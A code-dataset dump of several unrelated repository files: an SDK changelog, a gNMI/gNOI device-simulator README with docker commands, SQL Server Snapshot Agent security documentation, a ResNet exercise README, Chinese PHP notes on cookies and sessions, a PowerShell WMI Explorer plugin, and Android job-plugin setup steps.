"MIT"
] | 2 | 2021-09-01T04:16:02.000Z | 2021-12-22T07:06:08.000Z | CHANGELOG.md | DeAccountSystems/das-sdk-js | 465c37b9bb3725e7f6480cec2f7b24ba1bbbd454 | [
"MIT"
] | 3 | 2021-08-19T10:08:18.000Z | 2021-11-15T02:01:41.000Z | # Changelog
All notable changes to this project will be documented in this file. See [standard-version](https://github.com/conventional-changelog/standard-version) for commit guidelines.
### [1.1.5](https://github.com/DeAccountSystems/das-sdk/compare/v1.1.2...v1.1.5) (2021-12-29)
### Bug Fixes
* add missing dependency `node-fetch` ([4009afe](https://github.com/DeAccountSystems/das-sdk/commit/4009afe9da6deea4677c76ff79b99de439299ba9))
### [1.1.2](https://github.com/DeAccountSystems/das-sdk/compare/v1.1.0...v1.1.2) (2021-12-27)
## [1.1.0](https://github.com/DeAccountSystems/das-sdk/compare/v0.4.1...v1.1.0) (2021-12-24)
### Features
* **Das.ts:** remove `accountsForOwner()`, add `reverseRecord()` ([bb2dffa](https://github.com/DeAccountSystems/das-sdk/commit/bb2dffaa6b2d92edae9e7b98445db620fcbc25e5))
* **DasService.ts:** integrate with new das-account-indexer ([bf9cac4](https://github.com/DeAccountSystems/das-sdk/commit/bf9cac4eecc7535f457b6a156a78d285ce5284d8))
### [0.4.1](https://github.com/DeAccountSystems/das-sdk/compare/v0.3.3...v0.4.1) (2021-08-09)
### Features
* add method `accountsForOwner` ([4fbd77f](https://github.com/DeAccountSystems/das-sdk/commit/4fbd77f1f9c0cdc06bd81e9f28aafb0a98c99286))
* remove unnecessary dependencies ([2645d14](https://github.com/DeAccountSystems/das-sdk/commit/2645d14d16ff4d4179d2d6b7bd08a38648c98821))
### [0.3.3](https://github.com/DeAccountSystems/das-sdk/compare/v0.3.1...v0.3.3) (2021-07-29)
### Features
* remove unused code ([82bc2d1](https://github.com/DeAccountSystems/das-sdk/commit/82bc2d15c24860fd184d0c5642f629941d608fc2))
* remove unused code ([339eea5](https://github.com/DeAccountSystems/das-sdk/commit/339eea5008143b7c19593d0ca75c8bfb2b4b678b))
### Bug Fixes
* `custom` => `custom_key` ([68b8b50](https://github.com/DeAccountSystems/das-sdk/commit/68b8b50df0ac419e51897e6ebf3966219870de8b))
### [0.3.1](https://github.com/DeAccountSystems/das-sdk/compare/v0.2.1...v0.3.1) (2021-07-26)
### Features
* add Das() class ([58ae5bd](https://github.com/DeAccountSystems/das-sdk/commit/58ae5bd71b85d9790dbd4ccc76333fd1e68d9506))
### [0.2.1](https://github.com/DeAccountSystems/das-sdk/compare/v0.1.5...v0.2.1) (2021-07-24)
### Features
* add `account()` function ([b13f077](https://github.com/DeAccountSystems/das-sdk/commit/b13f07756ae79d99e49410bcfb0b93daf866fe23))
### [0.1.5](https://github.com/DeAccountSystems/das-sdk/compare/v0.1.3...v0.1.5) (2021-07-20)
### Bug Fixes
* fix `addr()` bug ([7f52461](https://github.com/DeAccountSystems/das-sdk/commit/7f5246169a78023d04e74c76210d930ddfc6976b))
### [0.1.3](https://github.com/DeAccountSystems/das-sdk/compare/v0.0.3...v0.1.3) (2021-07-20)
### Features
* add `recordsByKey()` method ([ffe5230](https://github.com/DeAccountSystems/das-sdk/commit/ffe523087bcd519741cf553447ca142627f1e6dc))
* add configuration docs ([ac5224b](https://github.com/DeAccountSystems/das-sdk/commit/ac5224b02476a200f876f975426751488403f5d0))
* add test for `recordsByKey` ([bad1b93](https://github.com/DeAccountSystems/das-sdk/commit/bad1b9315bc2bbf539358db4718b7896407a8a06))
* add test for autonetwork ([16fbd90](https://github.com/DeAccountSystems/das-sdk/commit/16fbd90f18fdd986f4e439f045920028008cee70))
* implement autonetwork ([6925df6](https://github.com/DeAccountSystems/das-sdk/commit/6925df6a773743f21e9bdfb7ff2b73f09d23a356))
### Bug Fixes
* fix test ([20bc061](https://github.com/DeAccountSystems/das-sdk/commit/20bc0613fa14d321bba4c3361ba09766e2135935))
### [0.1.1](https://github.com/DeAccountSystems/das-sdk/compare/v0.0.3...v0.1.1) (2021-07-19)
### Features
* add `recordsByKey()` method ([ffe5230](https://github.com/DeAccountSystems/das-sdk/commit/ffe523087bcd519741cf553447ca142627f1e6dc))
* add test for `recordsByKey` ([bad1b93](https://github.com/DeAccountSystems/das-sdk/commit/bad1b9315bc2bbf539358db4718b7896407a8a06))
* add test for autonetwork ([16fbd90](https://github.com/DeAccountSystems/das-sdk/commit/16fbd90f18fdd986f4e439f045920028008cee70))
* implement autonetwork ([6925df6](https://github.com/DeAccountSystems/das-sdk/commit/6925df6a773743f21e9bdfb7ff2b73f09d23a356))
### Bug Fixes
* fix test ([20bc061](https://github.com/DeAccountSystems/das-sdk/commit/20bc0613fa14d321bba4c3361ba09766e2135935))
### 0.0.3 (2021-07-14)
### Features
* add Das ([b0e3ba8](https://github.com/DeAccountSystems/das-sdk/commit/b0e3ba80f0d992dabc7312fe9fe8e6b8632a35a2))
* change build files ([3f5e810](https://github.com/DeAccountSystems/das-sdk/commit/3f5e810fb726ab1e38963417e187872d4de1b414))
* change repo ([5e38ddf](https://github.com/DeAccountSystems/das-sdk/commit/5e38ddf636053f8cc7327a2104bf6ffa000c9c34))
* remove unused files ([3b64a19](https://github.com/DeAccountSystems/das-sdk/commit/3b64a1931bd26543624f56c86405cfcf5c5f06ee))
### Bug Fixes
* fix record bug ([18a0a82](https://github.com/DeAccountSystems/das-sdk/commit/18a0a8235c2d72cf5a2a5d57f5c53ca068cd8411))
| 45.330275 | 174 | 0.77292 | yue_Hant | 0.509659 |
e03bbbb3d3a6c6cb03047bb7385cc312e1deb466 | 4,621 | md | Markdown | docs/README.md | ray-milkey/gnxi-simulators | 9fa14047d409d7a64cce9f92a42a02238dea01b8 | [
"Apache-2.0"
] | 5 | 2020-02-07T15:57:23.000Z | 2022-03-23T14:11:30.000Z | docs/README.md | ray-milkey/gnxi-simulators | 9fa14047d409d7a64cce9f92a42a02238dea01b8 | [
"Apache-2.0"
] | 10 | 2020-04-14T20:34:04.000Z | 2022-03-22T18:35:22.000Z | docs/README.md | ray-milkey/gnxi-simulators | 9fa14047d409d7a64cce9f92a42a02238dea01b8 | [
"Apache-2.0"
] | 7 | 2020-04-15T23:44:15.000Z | 2021-12-13T10:31:12.000Z | **Table of Contents**
- [1. Device Simulator](#1-Device-Simulator)
- [1.1. Simulator mode](#11-Simulator-mode)
- [1.2. Run mode - localhost or network](#12-Run-mode---localhost-or-network)
- [1.3. docker-compose](#13-docker-compose)
- [1.3.1. Running on Linux](#131-Running-on-Linux)
- [1.4. Run a single docker container](#14-Run-a-single-docker-container)
- [1.5. Create the docker image](#15-Create-the-docker-image)
- [2. Client tools for testing](#2-Client-tools-for-testing)
- [2.1. gNMI Client User Manual](#21-gNMI-Client-User-Manual)
- [2.2. gNOI Client User Manual](#22-gNOI-Client-User-Manual)
# 1. Device Simulator
This is a docker VM that runs a gNMI and/or gNOI implementation
supporting openconfig models.
Inspired by https://github.com/faucetsdn/gnmi
All commands below assume you are in the __devicesim__ directory
## 1.1. Simulator mode
The device simulator can operate in three modes, controlled
using **SIM_MODE** environment variable in the docker-compose file.
1) SIM_MODE=1 as gNMI target only. The configuration is loaded by default from [configs/target_configs/typical_ofsw_config.json](../configs/target_configs/typical_ofsw_config.json)
2) SIM_MODE=2 as gNOI target only. It supports *Certificate management* that can be used for certificate installation and rotation.
3) SIM_MODE=3 both gNMI and gNOsI targets simultaneously
## 1.2. Run mode - localhost or network
Additionally the simulator can be run in
* localhost mode - use on Docker for Mac, Windows or Linux
* dedicated network mode - for use on Linux only
> Docker for Mac or Windows does not support accessing docker images
> externally in dedicated network mode. Docker on Linux can run either.
## 1.3. docker-compose
Docker compose manages the running of several docker images at once.
For example to run 3 **SIM_MODE=1** (gNMI only devices) and **localhost** mode, use:
```bash
cd tools/docker_compose
docker-compose -f docker-compose-gnmi.yml up
```
This gives an output like
```bash
Creating devicesim_devicesim3_1 ...
Creating devicesim_devicesim1_1 ...
Creating devicesim_devicesim2_1 ...
Creating devicesim_devicesim3_1
Creating devicesim_devicesim2_1
Creating devicesim_devicesim1_1 ... done
Attaching to devicesim_devicesim3_1, devicesim_devicesim2_1, devicesim_devicesim1_1
devicesim3_1 | gNMI running on localhost:10163
devicesim2_1 | gNMI running on localhost:10162
devicesim1_1 | gNMI running on localhost:10161
```
> Use the -d mode with docker-compose to make it run as a daemon in the background
### 1.3.1. Running on Linux
If you are fortunate enough to be using Docker on Linux, then you can use the
above method __or__ using the command below to start in **SIM_MODE=1** and **network** mode:
```bash
cd tools/docker_compose
docker-compose -f docker-compose-linux.yml up
```
This will use the fixed IP addresses 172.25.0.11, 172.25.0.12, 172.25.0.13 for
device1-3. An entry must still be placed in your /etc/hosts file for all 3 like:
```bash
172.25.0.11 device1.opennetworking.org
172.25.0.12 device2.opennetworking.org
172.25.0.13 device3.opennetworking.org
```
> This uses a custom network 'simnet' in Docker and is only possible on Docker for Linux.
> If you are on Mac or Windows it is __not possible__ to route to User Defined networks,
> so the port mapping technique must be used.
> It is not possible to use the name mapping of the docker network from outside
> the cluster, so either the entries have to be placed in /etc/hosts or on some
> DNS server
## 1.4. Run a single docker container
If you just want to run a single device, it is not necessary to run
docker-compose. It can be done just by docker directly, and can be
handy for troubleshooting. The following command shows how to run
a standalone simulator in SIM_MODE=3, localhost mode:
```bash
docker run --env "HOSTNAME=localhost" --env "SIM_MODE=3" \
--env "GNMI_PORT=10164" --env "GNOI_PORT=50004" \
-p "10164:10164" -p "50004:50004" onosproject/device-simulator:latest
```
To stop it use "docker kill"
## 1.5. Create the docker image
By default the docker compose command will pull down the latest docker
image from the Docker Hub. If you need to build it locally, run:
```bash
docker build -t onosproject/device-simulator:stable -f Dockerfile .
```
# 2. Client tools for testing
You can access to the information about client tools for each SIM_MODE
including troubleshooting tips using the following links:
## 2.1. gNMI Client User Manual
[gNMI Client_User Manual](gnmi/gnmi_user_manual.md)
## 2.2. gNOI Client User Manual
[gNOI Client_User Manual](gnoi/gnoi_user_manual.md)
| 39.836207 | 180 | 0.760225 | eng_Latn | 0.953126 |
e03bc5414104c588ee4204f58b025bbe776d9bd1 | 4,081 | md | Markdown | docs/relational-databases/replication/snapshot-agent-security.md | rsanderson2350/sql-docs | 3206a31870f8febab7d1718fa59fe0590d4d45db | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-07-05T14:10:29.000Z | 2019-07-05T14:10:29.000Z | docs/relational-databases/replication/snapshot-agent-security.md | rsanderson2350/sql-docs | 3206a31870f8febab7d1718fa59fe0590d4d45db | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/relational-databases/replication/snapshot-agent-security.md | rsanderson2350/sql-docs | 3206a31870f8febab7d1718fa59fe0590d4d45db | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-09-16T00:08:14.000Z | 2019-09-16T00:08:14.000Z | ---
title: "Snapshot Agent Security | Microsoft Docs"
ms.custom: ""
ms.date: "03/14/2017"
ms.prod: "sql-non-specified"
ms.prod_service: "database-engine, sql-database"
ms.service: ""
ms.component: "replication"
ms.reviewer: ""
ms.suite: "sql"
ms.technology:
- "replication"
ms.tgt_pltfrm: ""
ms.topic: "article"
f1_keywords:
- "sql13.rep.security.SSA.f1"
helpviewer_keywords:
- "Snapshot Agent Security dialog box"
ms.assetid: 64e84c67-acc6-4906-98d4-3451767363fe
caps.latest.revision: 21
author: "MikeRayMSFT"
ms.author: "mikeray"
manager: "craigg"
ms.workload: "Inactive"
---
# Snapshot Agent Security
[!INCLUDE[appliesto-ss-asdb-xxxx-xxx-md](../../includes/appliesto-ss-asdb-xxxx-xxx-md.md)]
The **Snapshot Agent Security** dialog box allows you to specify:
- The [!INCLUDE[msCoName](../../includes/msconame-md.md)] Windows account under which the Snapshot Agent runs at the Distributor. The Windows account is also referred to as the *process account*, because the agent process runs under this account.
- The context under which the Snapshot Agent makes connections to the [!INCLUDE[msCoName](../../includes/msconame-md.md)] [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] Publisher. The connection can be made by impersonating the Windows account or under the context of a [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] account you specify.
> [!NOTE]
> The Snapshot Agent makes connections to the Publisher even if the Publisher and Distributor are on the same computer. The Snapshot Agent also makes connections to the Distributor; these connections are always made by impersonating the Windows account under which the agent runs.
For Oracle Publishers, specify the context under which the Snapshot Agent connects to the Publisher in the **Publisher Properties** dialog box (available from the **Distributor Properties** dialog box). For more information, see [View and Modify Replication Security Settings](../../relational-databases/replication/security/view-and-modify-replication-security-settings.md).
All accounts must be valid, with the correct password specified for each account. Accounts and passwords are not validated until an agent runs.
## Options
**Process account**
Enter a Windows account under which the Snapshot Agent runs at the Distributor. The Windows account you specify must:
- At minimum be a member of the **db_owner** fixed database role in the distribution database.
- Have write permissions on the snapshot share.
**Password** and **Confirm password**
Enter the password for the Windows account.
**Connect to the Publisher**
Select whether the Snapshot Agent should make connections to the Publisher by impersonating the account specified in the **Process account** text box or by using a [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] account. If you select to use a [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] account, enter a [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] login and password.
> [!NOTE]
> It is recommended that you select to impersonate the Windows account rather than using a [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] account.
The Windows account or [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] account used for the connection must at minimum be a member of the **db_owner** fixed database role in the publication database.
## See Also
[Manage Logins and Passwords in Replication](../../relational-databases/replication/security/manage-logins-and-passwords-in-replication.md)
[Replication Agent Security Model](../../relational-databases/replication/security/replication-agent-security-model.md)
[Replication Agents Overview](../../relational-databases/replication/agents/replication-agents-overview.md)
[Replication Security Best Practices](../../relational-databases/replication/security/replication-security-best-practices.md)
| 60.910448 | 410 | 0.737564 | eng_Latn | 0.95866 |
e03bccabc1f0e452e6b5131c9d0329288bc73510 | 353 | md | Markdown | Convolutional Neural Networks/week2/1 Residual_Networks/README.md | Saurabh2323/2021Deep-Learning-Specialization-Coursera | df0995092af39f917304c8f4b459e91ae8f635d0 | [
"Apache-2.0"
] | 15 | 2021-11-03T04:33:22.000Z | 2022-03-30T18:24:57.000Z | Convolutional Neural Networks/week2/1 Residual_Networks/README.md | Saurabh2323/2021Deep-Learning-Specialization-Coursera | df0995092af39f917304c8f4b459e91ae8f635d0 | [
"Apache-2.0"
] | null | null | null | Convolutional Neural Networks/week2/1 Residual_Networks/README.md | Saurabh2323/2021Deep-Learning-Specialization-Coursera | df0995092af39f917304c8f4b459e91ae8f635d0 | [
"Apache-2.0"
] | 21 | 2021-11-03T04:34:11.000Z | 2022-03-22T10:17:06.000Z | **ResNet**
*ResNet* means *Residual Networks*
In this part, you will learn to implement a skip connection in your network
Basically you will implement the basic building blocks of ResNets in a deep neural network using Keras and then put together these building blocks to implement and train a state-of-the-art neural network for image classification
| 50.428571 | 228 | 0.807365 | eng_Latn | 0.998508 |
e03be70d2863a7d0b1fd3b3ccc30e3562e2d4b90 | 2,286 | md | Markdown | docs/Instances.ps1.md | MSAdministrator/PoshCodeMarkDown | 062c6065193eaeb46efc185ee9a25b4957ed98b5 | [
"MIT"
] | 7 | 2019-02-22T05:58:27.000Z | 2021-09-02T09:43:52.000Z | docs/Instances.ps1.md | MSAdministrator/PoshCodeMarkDown | 062c6065193eaeb46efc185ee9a25b4957ed98b5 | [
"MIT"
] | 1 | 2021-05-19T09:30:21.000Z | 2021-05-19T09:30:21.000Z | docs/Instances.ps1.md | MSAdministrator/PoshCodeMarkDown | 062c6065193eaeb46efc185ee9a25b4957ed98b5 | [
"MIT"
] | 2 | 2018-08-29T13:55:38.000Z | 2021-01-07T18:29:18.000Z | ---
Author: janny
Publisher:
Copyright:
Email:
Version: 1.01
Encoding: ascii
License: cc0
PoshCode ID: 4877
Published Date: 2014-02-04t14
Archived Date: 2014-02-07t23
---
# instances -
## Description
from greg�s repository on github. plugin for wmiexplorer (copy this file into “plugins” folder in $psscriptroot directory)
## Comments
## Usage
## TODO
##
``
## Code
`#
#
<?xml version="1.0"?>
<WmiExplorerPlugin>
<PluginAuthor>greg zakharov</PluginAuthor>
<PluginVersion>1.01</PluginVersion>
<InjectObject>$mnuInst</InjectObject>
<ObjectText>&Show Instances</ObjectText>
<Code>
if (Get-UserStatus) {
$frmInst = New-Object Windows.Forms.Form
$rtbInst = New-Object Windows.Forms.RichTextBox
#
#
$rtbInst.Dock = [Windows.Forms.DockStyle]::Fill
$rtbInst.ReadOnly = $true
#
#
$frmInst.ClientSize = New-Object Drawing.Size(530, 270)
$frmInst.Controls.Add($rtbInst)
$frmInst.Icon = $ico
$frmInst.StartPosition = [Windows.Forms.FormStartPosition]::CenterParent
$frmInst.Text = "Instances"
$frmInst.Add_Load({
try {
$ins = $wmi.GetInstances()
if ($ins.Count -ne 0) {
foreach ($i in $ins) {
$i.PSBase.Properties | % {
$rtbInst.SelectionFont = $bol2
$rtbInst.AppendText($_.Name + ': ')
$rtbInst.SelectionFont = $norm
if ($_.Value -eq $null) {
$rtbInst.AppendText("`n")
}
elseif ($_.IsArray) {
$ofs = ";"
$rtbInst.AppendText("$($_.Value)")
$ofs = $null
$rtbInst.AppendText("`n")
}
else {
$rtbInst.AppendText("$($_.Value)`n")
}
}
$rtbInst.AppendText("`n$('=' * 57)`n")
}
else {
$rtbInst.SelectionFont = $bol1
$rtbInst.AppendText("Out of context.")
}
}
catch [Management.Automation.RuntimeException] {}
[void]$frmInst.ShowDialog()
}
</Code>
</WmiExplorerPlugin>
`
| 22.86 | 122 | 0.512686 | yue_Hant | 0.769854 |
e03c3960cf5790e2a5a5a9ed6edbb2e386db2d42 | 8,443 | md | Markdown | docs/debugger/map-methods-on-the-call-stack-while-debugging-in-visual-studio.md | SunnyDeng/visualstudio-docs | 9989865054058dbd6c3a715958bd59a102fe9fba | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/debugger/map-methods-on-the-call-stack-while-debugging-in-visual-studio.md | SunnyDeng/visualstudio-docs | 9989865054058dbd6c3a715958bd59a102fe9fba | [
"CC-BY-4.0",
"MIT"
] | 3 | 2019-04-17T23:46:44.000Z | 2019-04-18T00:09:37.000Z | docs/debugger/map-methods-on-the-call-stack-while-debugging-in-visual-studio.md | SunnyDeng/visualstudio-docs | 9989865054058dbd6c3a715958bd59a102fe9fba | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: "Create a visual map of the call stack | Microsoft Docs"
ms.date: "11/26/2018"
ms.topic: "conceptual"
f1_keywords:
- "vs.progression.debugwithcodemaps"
dev_langs:
- "CSharp"
- "VB"
- "FSharp"
- "C++"
helpviewer_keywords:
- "call stacks, code maps"
- "Call Stack window, mapping calls"
- "debugging [Visual Studio], diagramming the call stack"
- "call stacks, mapping"
- "Call Stack window, visualizing"
- "debugging code visually"
- "debugging [Visual Studio], mapping the call stack"
- "call stacks, visualizing"
- "debugging, code maps"
- "Call Stack window, tracing calls visually"
- "Call Stack window, show on code map"
- "debugging [Visual Studio], tracing the call stack visually"
- "debugging [Visual Studio], visualizing the call stack"
ms.assetid: d6a72e5e-f88d-46fc-94a3-1789d34805ef
author: "mikejo5000"
ms.author: "mikejo"
manager: jillfra
ms.workload:
- "multiple"
---
# Create a visual map of the call stack while debugging (C#, Visual Basic, C++, JavaScript)
Create a code map to visually trace the call stack while you're debugging. You can make notes on the map to track what the code is doing, so you can focus on finding bugs.
For a walkthrough, watch this video:
[Video: Debug visually with Code Map debugger integration (Channel 9)](http://go.microsoft.com/fwlink/?LinkId=293418)
For details of commands and actions you can use with code maps, see [Browse and rearrange code maps](../modeling/browse-and-rearrange-code-maps.md).
>[!IMPORTANT]
>You can create code maps only in [Visual Studio Enterprise edition](https://visualstudio.microsoft.com/downloads/?utm_medium=microsoft&utm_source=docs.microsoft.com&utm_campaign=inline+link&utm_content=download+vs2019).
Here's a quick look at a code map:

## <a name="MapStack"></a> Map the call stack
1. In a Visual Studio Enterprise C#, Visual Basic, C++, or JavaScript project, start debugging by selecting **Debug** > **Start Debugging** or pressing **F5**.
1. After your app enters break mode or you step into a function, select **Debug** > **Code Map**, or press **Ctrl**+**Shift**+**`**.
The current call stack appears in orange on a new code map:

The code map updates automatically as you continue debugging. Changing map items or layout doesn't affect the code in any way. Feel free to rename, move, or remove anything on the map.
To get more information about an item, hover over it and look at the item's tooltip. You can also select **Legend** in the toolbar to learn what each icon means.

>[!NOTE]
>The message **The diagram may be based on an older version of the code** at the top of the code map means that the code might have changed after you last updated the map. For example, a call on the map might not exist in code anymore. Close the message, then try rebuilding the solution before updating the map again.
## Map external code
By default, only your own code appears on the map. To see external code on the map:
- Right-click in the **Call Stack** window and select **Show External Code**:

- Or, deselect **Enable Just My Code** in Visual Studio **Tools** (or **Debug**) > **Options** > **Debugging**:

## Control the map's layout
Changing the map's layout doesn't affect the code in any way.
To control the map's layout, select the **Layout** menu on the map toolbar.
In the **Layout** menu, you can:
- Change the default layout.
- Stop rearranging the map automatically, by deselecting **Automatically Layout when Debugging**.
- Rearrange the map as little as possible when you add items, by deselecting **Incremental Layout**.
## <a name="MakeNotes"></a> Make notes about the code
You can add comments to track what's happening in the code.
To add a comment, right-click in the code map and select **Edit** > **New Comment**, then type the comment.
To add a new line in a comment, press **Shift**+**Enter**.

## <a name="UpdateMap"></a> Update the map with the next call stack
As you run your app to the next breakpoint or step into a function, the map adds new call stacks automatically.

To stop the map from adding new call stacks automatically, select  on the code map toolbar. The map continues to highlight existing call stacks. To manually add the current call stack to the map, press **Ctrl**+**Shift**+**`**.
## <a name="AddRelatedCode"></a> Add related code to the map
Now that you've got a map, in C# or Visual Basic, you can add items like fields, properties, and other methods, to track what's happening in the code.
To go to the definition of a method in the code, double-click the method in the map, or select it and press **F12**, or right-click it and select **Go To Definition**.

To add items that you want to track to the map, right-click a method and select the items you want to track. The most recently added items appear in green.

>[!NOTE]
>By default, adding items to the map also adds the parent group nodes such as the class, namespace, and assembly. You can turn this feature off and on by selecting the **Include Parents** button on the code map toolbar, or by pressing **Ctrl** while you add items.

Continue building the map to see more code.


## <a name="FindBugs"></a> Find bugs using the map
Visualizing your code can help you find bugs faster. For example, suppose you're investigating a bug in a drawing app. When you draw a line and try to undo it, nothing happens until you draw another line.
So you set breakpoints in the `clear`, `undo`, and `Repaint` methods, start debugging, and build a map like this one:

You notice that all the user gestures on the map call `Repaint`, except for `undo`. This might explain why `undo` doesn't work immediately.
After you fix the bug and continue running the app, the map adds the new call from `undo` to `Repaint`:

## Share the map with others
You can export a map, send it to others with Microsoft Outlook, save it to your solution, and check it into version control.
To share or save the map, use **Share** in the code map toolbar.

## See also
[Map dependencies across your solutions](../modeling/map-dependencies-across-your-solutions.md)
[Use code maps to debug your applications](../modeling/use-code-maps-to-debug-your-applications.md)
[Find potential problems using code map analyzers](../modeling/find-potential-problems-using-code-map-analyzers.md)
[Browse and rearrange code maps](../modeling/browse-and-rearrange-code-maps.md)
| 52.440994 | 370 | 0.754471 | eng_Latn | 0.953594 |
e03ccc14f03c318d25b1c2fa77c5c4fb17e28aef | 6,855 | md | Markdown | 2.0-cookie.md | Alpha-CL/PHP-Note | ea739daa41d738d566ca2fbddfc8abaa80bb937f | [
"Apache-2.0"
] | 1 | 2019-12-16T10:55:32.000Z | 2019-12-16T10:55:32.000Z | 2.0-cookie.md | Alpha-CL/PHP-Note | ea739daa41d738d566ca2fbddfc8abaa80bb937f | [
"Apache-2.0"
] | null | null | null | 2.0-cookie.md | Alpha-CL/PHP-Note | ea739daa41d738d566ca2fbddfc8abaa80bb937f | [
"Apache-2.0"
] | null | null | null | # HTTP 会话
#### Cookie
> HTTP 很重要的一个特点 `无状态`( 每次见面都是 `初次见面`)
> 如果希望服务端程序去记住每个访问的访客是不可能的
> 必须借助一些手段或者技巧让服务端记住客户端,这种手段就是`Cookie`
``` vim
+ -------- + + -------- +
| | | |
| | | |
| | ----------------------------------------> | |
| | | |
| | GET http://www.example.com/ HTTP/1.1 | |
| | | |
| | | |
| | <---------------------------------------- | |
| | | |
| Client | HTTP/1.1 200 OK | Server |
| | set-cookie: session-id=12345; | |
| | | |
| | | |
| | ----------------------------------------> | |
| | | |
| | GET http://www.example.com/ HTTP/1.1 | |
| | cookie: session-id=12345; | |
| | | |
| | | |
+ -------- + + -------- +
```
#### 设置 Cookie
__php cookie__
``` php
//! set Response Headers 'Set-Cookie' => request server
header('Set-Cookie: foo = bar');
//! php set cookie method
//para1: 设置为一个过去时间
setcookie('key');
//para2: 设置 cookie 的 name value
setcookie('key1', 'value1');
//para3: 过期时间,过期后 cookie 不生效
setcookie('key2', 'value', time() + 1 * 24 + 60 * 60);
//para4: 设置 cookie domain ( 作用域名范围 )
setcookie('key4', 'value4', time() + 1 * 24 + 60 * 60, '/');
//TODO: para5, para6 ...
setcookie('key4', 'value4', time() + 1 * 24 + 60 * 60, '/', '', false, true);
//! receive cookie
var_dump($_COOKIE);
```
> JS cookie 无法访问到 。。。。。?
__JS cookie__
``` javascript
//set only cookie
document.cookie = 'js = fuck';
//receive all cookie
document.cookie;
```
#### Session
本地造假 cookie
``` javascript
var dt = new Date();
dt.setYear(2018);
document.cookie = 'app-installed=1; expires=' + dt.toGMTSring();
```
> Cookie 是服务器给客户由 `客户端本地保存`,客户可以在本地随意操作( 删除/修改 )
> 也可以伪造假 Cookie,对于服务端是无法辨别的,会造成 服务端被蒙蔽,构成`安全隐患`
> Session 是 Cookie 升级版
``` vim
+ ------------------------------------------------------------------------------------- +
| |
| |
| Server |
| |
| + ------------------------------------------------ + |
| | | |
+ ---------- + | | Session | |
| | | | |
| | Cookie session_id=0x001 + ---------------- + ------------- + ------------- + |
| client1 |---------------------------------> | 0x001 | 0x002 | 0x003 | |
| | | + ---------------- + ------------- + ------------- + |
| | | | key1: hello | key1: some | key1:may | |
+ ---------- + | + ---------------- + ------------- + ------------- + |
+ ---------- + | | key2: world | key2: time | | |
| | + ---------------- + ------------- + ------------- + |
| | Cookie session_id=0x002 | | key3: ok | | |
| client2 |---------------------------------> + ---------------- + ------------- + ------------- + |
| | | | | |
| | | + ---------------- + ------------- + ------------- + |
+ ---------- + | | 0x004 | 0x005 | 0x006 | |
+ ---------- + | + ---------------- + ------------- + ------------- + |
| | | who | | | |
| | Cookie session_id=0x003 + ---------------- + ------------- + ------------- + |
| client3 |---------------------------------> | | | | |
| | | + ---------------- + ------------- + ------------- + |
| | | | | | | |
+ ---------- + | + ---------------- + ------------- + ------------- + |
| | | | | |
| +------------------------------------------------- + |
| |
| |
| |
+ ------------------------------------------------------------------------------------- +
```
__Session 与 Cookie 区别__
> Cookie 数据存放在`本地客户端`,Session 数据存放在`服务器`
> 用户无法修改客户端数据,所以相对安全
``` php
//帮助用户找箱子( 有则进入,无则创建 )
session_start();
//设置 session
$_SESSION['key'] = 'value';
```
| 27.641129 | 144 | 0.169657 | yue_Hant | 0.324856 |
e03d1d248c20bbb6e3010f104cd50a43d00d879e | 72 | md | Markdown | README.md | nuttka/banco-de-dados | 9bfbd6e9f8aa2f739c64dfd51be936f70bdd89bb | [
"MIT"
] | null | null | null | README.md | nuttka/banco-de-dados | 9bfbd6e9f8aa2f739c64dfd51be936f70bdd89bb | [
"MIT"
] | null | null | null | README.md | nuttka/banco-de-dados | 9bfbd6e9f8aa2f739c64dfd51be936f70bdd89bb | [
"MIT"
] | null | null | null | # banco-de-dados
Repositório para a matéria Introdução à Banco de Dados
| 24 | 54 | 0.805556 | por_Latn | 1.000001 |
e03d9b90ac7e4a330ed8e9fd432cf1c60d50784f | 1,416 | md | Markdown | platform_android.md | aritchie/jobs | e8a51928c300132af52970195c7203f7ddda4b28 | [
"MIT"
] | 97 | 2018-09-14T08:37:38.000Z | 2020-06-25T13:49:09.000Z | platform_android.md | aritchie/jobs | e8a51928c300132af52970195c7203f7ddda4b28 | [
"MIT"
] | 9 | 2018-10-01T14:57:04.000Z | 2020-02-04T12:36:59.000Z | platform_android.md | aritchie/jobs | e8a51928c300132af52970195c7203f7ddda4b28 | [
"MIT"
] | 15 | 2018-09-25T21:46:43.000Z | 2021-07-12T00:03:53.000Z | ## Setup - Android
1.Install From [](https://www.nuget.org/packages/Plugin.Jobs/)
2. In Android, you must create an Application class similar to below
```csharp
sing System;
using Android.App;
using Android.Runtime;
using Plugin.Jobs;
namespace Sample.Droid
{
[Application]
public class MainApplication : Application
{
static IContainer container;
public MainApplication(IntPtr handle, JniHandleOwnership transfer) : base(handle, transfer)
{
}
public override void OnCreate()
{
CrossJobs.Init(this);
base.OnCreate();
}
}
}
```
3.Add the following to your AndroidManifest.xml
```xml
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.BATTERY_STATS" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
```
__OPTIONAL__
On Android, you'll have to set the CrossJob.ResolveJob = (jobInfo) => return IJob in the MainApplication
### NOTES
* If Doze is enabled, the reschedule period is not guaranteed to be an average of 10 mins. It may be much longer.
* IF YOU ARE NOT SCHEDULING YOUR JOBS ON EVERY START - If you application force quits, Android will not restart the job scheduler. For this, there is CrossJobs.EnsureJobServiceStarted | 28.32 | 184 | 0.716808 | eng_Latn | 0.518105 |
e03ddd47c5a786af2e58c356bcde06303471c419 | 28,934 | md | Markdown | b01lersctf2020/blind-piloting/README.md | nhtri2003gmail/ctf-write-ups | 7e969c47027c39b614e10739ae3a953eed17dfa3 | [
"MIT"
] | 101 | 2020-03-09T17:40:47.000Z | 2022-03-31T23:26:55.000Z | b01lersctf2020/blind-piloting/README.md | nhtri2003gmail/ctf-write-ups | 7e969c47027c39b614e10739ae3a953eed17dfa3 | [
"MIT"
